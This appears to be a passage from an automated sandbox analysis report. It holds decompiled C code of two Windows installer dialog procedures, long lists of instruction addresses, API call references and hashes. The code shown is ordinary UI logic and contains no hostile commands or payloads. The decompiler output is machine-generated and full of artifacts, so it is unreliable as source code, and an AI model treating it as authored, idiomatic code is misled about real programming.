				signed int* _t299;
				int _t300;
				long _t301;
				int _t303;
				long _t304;
				int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t316;
				signed char* _t324;
				int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t191 = GetDlgItem(_a4, 0x408);
				_t298 =  *0x42a2a8;
				_t331 = SendMessageW;
				_v8 = _t191;
				_v36 = _t298;
				_v24 =  *0x42a274 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t307 = _a16;
					} else {
						_a12 = 0;
						_t307 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t307;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
							if(( *0x42a27d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t307 = 0 | _a8 != 0x00000413;
								_t249 = E00404E4D(_v8, _a8 != 0x413);
								_v20 = _t249;
								if(_t249 >= 0) {
									_t100 = _t298 + 8; // 0x8
									_t307 = _t249 * 0x818 + _t100;
									_t251 =  *_t307;
									if((_t251 & 0x00000010) == 0) {
										if((_t251 & 0x00000040) == 0) {
											_t252 = _t251 ^ 0x00000001;
										} else {
											_t260 = _t251 ^ 0x00000080;
											if(_t260 >= 0) {
												_t252 = _t260 & 0x000000fe;
											} else {
												_t252 = _t260 | 0x00000001;
											}
										}
										 *_t307 = _t252;
										E0040117D(_v20);
										_a8 = 0x40f;
										_a12 = _v20 + 1;
										_a16 =  !( *0x42a27c) >> 0x00000008 & 0x00000001;
									}
								}
								goto L41;
							}
							_t307 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42372c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x423740;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2e0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a27d & 0x00000001) != 0) {
									_t329 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t329);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
								}
								goto L93;
							} else {
								E004011EF(_t307, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404ECD();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t307, 0, 0);
									_v36 =  *0x423740;
									_t206 =  *0x42a2a8;
									_v64 = 0xf030;
									_v20 = 0;
									if( *0x42a2ac <= 0) {
										L86:
										if( *0x42a26c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404E08(0x3ff, 0xfffffffb, E00404E20(5));
										}
										goto L90;
									}
									_t299 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
										if(_t212 != 0) {
											_t309 =  *_t299;
											_v72 = _t212;
											_v76 = 8;
											if((_t309 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t299[4]);
												_t299[0] = _t299[0] & 0x000000fe;
											}
											if((_t309 & 0x00000040) == 0) {
												_t216 = (_t309 & 0x00000001) + 1;
												if((_t309 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v20 = _v20 + 1;
										_t299 =  &(_t299[0x206]);
									} while (_v20 <  *0x42a2ac);
									goto L86;
								} else {
									_t300 = E004012E2( *0x423740);
									E00401299(_t300);
									_t227 = 0;
									_t307 = 0;
									if(_t300 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t307, 0);
										_a16 = _t300;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
											_t307 = _t307 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t300);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
								_t301 = 0x20;
							}
							E00401299(_t301);
							SendMessageW(_a4, 0x420, 0, _t301);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42a2e0 = _a4;
					_t303 = 2;
					_v32 = 0;
					_v20 = _t303;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a2ac << 2);
					_t265 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_v16 = _t265;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E00405518);
					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t267;
					ImageList_AddMasked(_t267, _v16, 0xff00ff);
					SendMessageW(_v8, 0x1109, _t303,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v16);
					_t304 = 0;
					do {
						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
							if(_t304 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406579(_t304, 0, _t331, 0, _t273)), _t304);
						}
						_t304 = _t304 + 1;
					} while (_t304 < 0x21);
					_t305 = _a16;
					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404492(_a4);
					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404492(_a4);
					_t306 = 0;
					_v16 = 0;
					if( *0x42a2ac <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t324 = _v36 + 8;
						_v28 = _t324;
						do {
							_t285 =  &(_t324[0x10]);
							if( *_t285 != 0) {
								_v64 = _t285;
								_t286 =  *_t324;
								_v88 = _v16;
								_t316 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t316;
								_v44 = _t306;
								_v72 = _t286 & _t316;
								if((_t286 & 0x00000002) == 0) {
									if((_t286 & 0x00000004) == 0) {
										 *( *0x423740 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v32 = 1;
									 *( *0x423740 + _t306 * 4) = _t291;
									_v16 =  *( *0x423740 + _t306 * 4);
								}
							}
							_t306 = _t306 + 1;
							_t324 =  &(_v28[0x818]);
							_v28 = _t324;
						} while (_t306 <  *0x42a2ac);
						if(_v32 != 0) {
							L20:
							if(_v20 != 0) {
								E004044C7(_v8);
								_t298 = _v36;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044C7(_v12);
								L93:
								return E004044F9(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































              0x00404f1d
              0x00404f23
              0x00404f25
              0x00404f2b
              0x00404f31
              0x00404f47
              0x00404f4a
              0x00404f4d
              0x00405180
              0x00405187
              0x0040519b
              0x00405189
              0x0040518b
              0x0040518e
              0x0040518f
              0x00405196
              0x00405196
              0x004051a7
              0x004051b5
              0x004051b8
              0x004051ce
              0x00405246
              0x00405249
              0x0040524b
              0x00405255
              0x00405263
              0x00405263
              0x00405265
              0x0040526f
              0x00405275
              0x00405278
              0x00405293
              0x0040527a
              0x00405284
              0x00405284
              0x00405278
              0x0040526f
              0x00000000
              0x00405249
              0x004051d3
              0x004051de
              0x004051e3
              0x004051ea
              0x004051f1
              0x004051f4
              0x004051fc
              0x004051fc
              0x00405200
              0x00405204
              0x00405208
              0x0040521b
              0x0040520a
              0x0040520a
              0x00405211
              0x00405217
              0x00405213
              0x00405213
              0x00405213
              0x00405211
              0x00405221
              0x00405223
              0x0040522b
              0x00405233
              0x00405243
              0x00405243
              0x00405204
              0x00000000
              0x004051f4
              0x004051d5
              0x004051dc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405296
              0x00405296
              0x0040529d
              0x0040530e
              0x00405315
              0x00405321
              0x00405321
              0x0040532a
              0x0040532c
              0x00405333
              0x00405336
              0x00405336
              0x0040533c
              0x00405343
              0x00405346
              0x00405346
              0x0040534c
              0x00405352
              0x00405358
              0x00405358
              0x00405365
              0x004054c5
              0x004054cc
              0x004054e9
              0x004054ef
              0x00405501
              0x00405501
              0x00000000
              0x0040536b
              0x0040536d
              0x00405372
              0x00405377
              0x0040537c
              0x0040537e
              0x0040537e
              0x0040537f
              0x00405380
              0x00405382
              0x00405382
              0x0040538a
              0x004053cb
              0x004053cd
              0x004053dd
              0x004053e0
              0x004053e5
              0x004053ec
              0x004053ef
              0x00405491
              0x00405499
              0x004054a1
              0x004054a1
              0x004054af
              0x004054c0
              0x004054c0
              0x00000000
              0x004054af
              0x004053f5
              0x004053f8
              0x004053fe
              0x00405403
              0x00405405
              0x00405407
              0x0040540d
              0x00405414
              0x00405419
              0x00405420
              0x00405423
              0x00405423
              0x0040542a
              0x00405436
              0x0040543a
              0x0040543c
              0x0040543c
              0x0040542c
              0x0040542e
              0x0040542e
              0x0040545c
              0x00405468
              0x00405477
              0x00405477
              0x00405479
              0x0040547c
              0x00405485
              0x00000000
              0x0040538c
              0x00405397
              0x0040539a
              0x0040539f
              0x004053a1
              0x004053a5
              0x004053b5
              0x004053bf
              0x004053c1
              0x004053c4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004053a7
              0x004053a7
              0x004053ad
              0x004053af
              0x004053af
              0x004053b0
              0x004053b1
              0x00000000
              0x004053a7
              0x0040538a
              0x00405365
              0x004052a5
              0x00000000
              0x004052bb
              0x004052c5
              0x004052ca
              0x00000000
              0x00000000
              0x004052dc
              0x004052e1
              0x004052ed
              0x004052ed
              0x004052ef
              0x004052fe
              0x00405300
              0x00405304
              0x00405307
              0x00000000
              0x00405307
              0x004052a5
              0x00404f53
              0x00404f58
              0x00404f62
              0x00404f63
              0x00404f6c
              0x00404f7b
              0x00404f86
              0x00404f8c
              0x00404f9a
              0x00404faf
              0x00404fb4
              0x00404fbf
              0x00404fc8
              0x00404fdd
              0x00404fee
              0x00404ffb
              0x00404ffb
              0x00405000
              0x00405006
              0x00405008
              0x0040500b
              0x00405010
              0x00405015
              0x00405017
              0x00405017
              0x00405037
              0x00405037
              0x00405039
              0x0040503a
              0x0040503f
              0x00405045
              0x00405049
              0x0040504e
              0x00405056
              0x0040505a
              0x0040505f
              0x00405064
              0x0040506c
              0x0040506f
              0x0040513f
              0x00405152
              0x00000000
              0x00405075
              0x00405078
              0x0040507b
              0x0040507e
              0x0040507e
              0x00405084
              0x0040508d
              0x00405090
              0x00405094
              0x00405097
              0x0040509a
              0x004050a3
              0x004050ac
              0x004050af
              0x004050b2
              0x004050b5
              0x004050f3
              0x0040511e
              0x004050f5
              0x00405104
              0x00405104
              0x004050b7
              0x004050ba
              0x004050c8
              0x004050d2
              0x004050da
              0x004050e1
              0x004050ec
              0x004050ec
              0x004050b5
              0x00405124
              0x00405125
              0x00405131
              0x00405131
              0x0040513d
              0x00405158
              0x0040515b
              0x00405178
              0x0040517d
              0x00000000
              0x0040515d
              0x00405162
              0x0040516b
              0x00405503
              0x00405515
              0x00405515
              0x0040515b
              0x00000000
              0x0040513d
              0x0040506f

              APIs
              • GetDlgItem.USER32 ref: 00404F16
              • GetDlgItem.USER32 ref: 00404F23
              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
              • LoadImageW.USER32 ref: 00404F86
              • SetWindowLongW.USER32 ref: 00404FA0
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
              • DeleteObject.GDI32(00000110), ref: 00405000
              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
              • SetWindowLongW.USER32 ref: 00405152
              • ShowWindow.USER32(?,00000005), ref: 00405162
              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
              • ImageList_Destroy.COMCTL32(?), ref: 00405336
              • GlobalFree.KERNEL32 ref: 00405346
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
              • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
              • ShowWindow.USER32(?,00000000), ref: 004054EF
              • GetDlgItem.USER32 ref: 004054FA
              • ShowWindow.USER32(00000000), ref: 00405501
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 2564846305-813528018
              • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
              • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
              • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403FB9, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00403FB9(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x423730 = _t37;
					if(_t118 == 0x110) {
						 *0x42a268 = _t128;
						 *0x423744 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t94;
						E00404492(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x429248);
						 *0x42922c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t125 =  *0x40a39c; // 0xffffffff
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a2a0;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E004044DE(0x40b);
						while(1) {
							_t39 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0xffffffff
							__eflags = _t41 -  *0x42a2a4;
							if(_t41 ==  *0x42a2a4) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a2a4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E00406579(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404492(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404492(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a30c - _t136;
							_v32 = _t51;
							if( *0x42a30c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008);
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100);
							E004044B4(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x421710, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a30c - _t136;
							if( *0x42a30c == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004044C7();
							E0040653C(0x423748, E00403F9A());
							E00406579(0x423748, _t128, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x423748);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t76 - _t136;
									 *0x429238 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404492(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L61;
									}
									ShowWindow( *0x429238, 8);
									E004044DE(0x405);
									goto L58;
								}
								__eflags =  *0x42a30c - _t136;
								if( *0x42a30c != _t136) {
									goto L61;
								}
								__eflags =  *0x42a300 - _t136;
								if( *0x42a300 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429238);
						 *0x42a268 = _t136;
						EndDialog(_t128,  *0x421f18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x423728, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E004044F9(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x429238, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a30c - _t136;
										if( *0x42a30c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421f18 = 1;
											L21:
											_push(0x78);
											L22:
											E0040446B();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421f18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a39c - _t136; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x429238);
						 *0x429238 = _a12;
						L58:
						if( *0x425748 == _t136 &&  *0x429238 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x425748 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























              0x00403fc2
              0x00403fcb
              0x0040410c
              0x00404110
              0x00404114
              0x00404116
              0x0040411b
              0x00404126
              0x00404131
              0x00404136
              0x00404138
              0x0040413a
              0x0040413d
              0x00404142
              0x00404150
              0x0040415d
              0x00404164
              0x00404164
              0x00404165
              0x00404165
              0x0040416a
              0x00404170
              0x00404177
              0x0040417d
              0x0040417f
              0x004041bf
              0x004041c4
              0x004041c9
              0x004041c9
              0x004041ce
              0x004041d7
              0x004041d9
              0x004041de
              0x004041e4
              0x004041e8
              0x004041e8
              0x004041ed
              0x004041f3
              0x00000000
              0x00000000
              0x004041fe
              0x00404204
              0x00000000
              0x00000000
              0x0040420d
              0x00404215
              0x0040421a
              0x0040421d
              0x00404223
              0x00404228
              0x0040422b
              0x00404231
              0x00404236
              0x00404239
              0x0040423f
              0x00404247
              0x0040424d
              0x00404253
              0x00404257
              0x0040425e
              0x0040425e
              0x0040425e
              0x00404268
              0x0040427a
              0x00404286
              0x0040428b
              0x00404295
              0x0040429b
              0x0040429d
              0x004042a2
              0x0040429f
              0x0040429f
              0x0040429f
              0x004042b2
              0x004042ca
              0x004042cc
              0x004042d2
              0x004042e7
              0x004042d4
              0x004042dd
              0x004042df
              0x004042df
              0x004042ed
              0x004042fe
              0x00404314
              0x0040431b
              0x00404325
              0x0040432a
              0x0040432c
              0x00000000
              0x00404332
              0x00404332
              0x00404334
              0x00000000
              0x00000000
              0x0040433a
              0x0040433e
              0x00404363
              0x00404369
              0x0040436f
              0x00404371
              0x00000000
              0x00000000
              0x00404397
              0x0040439d
              0x0040439f
              0x004043a4
              0x00000000
              0x00000000
              0x004043aa
              0x004043ad
              0x004043b0
              0x004043c7
              0x004043d3
              0x004043ec
              0x004043f6
              0x004043fb
              0x00404401
              0x00000000
              0x00000000
              0x0040440b
              0x00404416
              0x00000000
              0x00404416
              0x00404340
              0x00404346
              0x00000000
              0x00000000
              0x0040434c
              0x00404352
              0x00000000
              0x00000000
              0x00000000
              0x00404358
              0x0040432c
              0x00404423
              0x0040442f
              0x00404436
              0x00000000
              0x00404181
              0x00404181
              0x00404184
              0x004041b7
              0x004041b7
              0x004041b9
              0x00000000
              0x00000000
              0x00000000
              0x004041b9
              0x0040418a
              0x0040418f
              0x00404191
              0x00000000
              0x00000000
              0x004041a1
              0x004041a9
              0x00000000
              0x004041af
              0x00403fdd
              0x00403fdd
              0x00403fe1
              0x00403fe6
              0x00403ff5
              0x00403ff5
              0x00403ffe
              0x00404007
              0x00404012
              0x00404012
              0x0040401e
              0x0040403a
              0x0040403d
              0x00404050
              0x00404056
              0x004040f9
              0x00000000
              0x00404102
              0x0040405c
              0x00404069
              0x0040406b
              0x0040406d
              0x0040408c
              0x0040408c
              0x0040408f
              0x00404094
              0x00404097
              0x004040a7
              0x004040a8
              0x004040aa
              0x004040e0
              0x004040f3
              0x00000000
              0x004040f3
              0x004040ac
              0x004040b2
              0x004040cb
              0x004040d0
              0x004040d2
              0x00000000
              0x00000000
              0x004040d4
              0x004040c0
              0x004040c0
              0x004040c2
              0x004040c2
              0x00000000
              0x004040c2
              0x004040b5
              0x004040ba
              0x00000000
              0x004040ba
              0x00404099
              0x0040409f
              0x00000000
              0x00000000
              0x004040a1
              0x00000000
              0x004040a1
              0x00404091
              0x00000000
              0x00404091
              0x00404077
              0x0040407e
              0x00404084
              0x00404086
              0x00000000
              0x00000000
              0x00000000
              0x00404086
              0x00404042
              0x00000000
              0x00404020
              0x00404026
              0x00404030
              0x0040443c
              0x00404442
              0x0040444f
              0x00404455
              0x00404455
              0x0040445f
              0x00000000
              0x0040445f
              0x0040401e

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
              • ShowWindow.USER32(?), ref: 00404012
              • DestroyWindow.USER32 ref: 00404026
              • SetWindowLongW.USER32 ref: 00404042
              • GetDlgItem.USER32 ref: 00404063
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
              • IsWindowEnabled.USER32(00000000), ref: 0040407E
              • GetDlgItem.USER32 ref: 0040412C
              • GetDlgItem.USER32 ref: 00404136
              • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
              • GetDlgItem.USER32 ref: 00404247
              • ShowWindow.USER32(00000000,?), ref: 00404268
              • EnableWindow.USER32(?,?), ref: 0040427A
              • EnableWindow.USER32(?,?), ref: 00404295
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
              • EnableMenuItem.USER32 ref: 004042B2
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
              • SetWindowTextW.USER32(?,00423748), ref: 0040431B
              • ShowWindow.USER32(?,0000000A), ref: 0040444F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
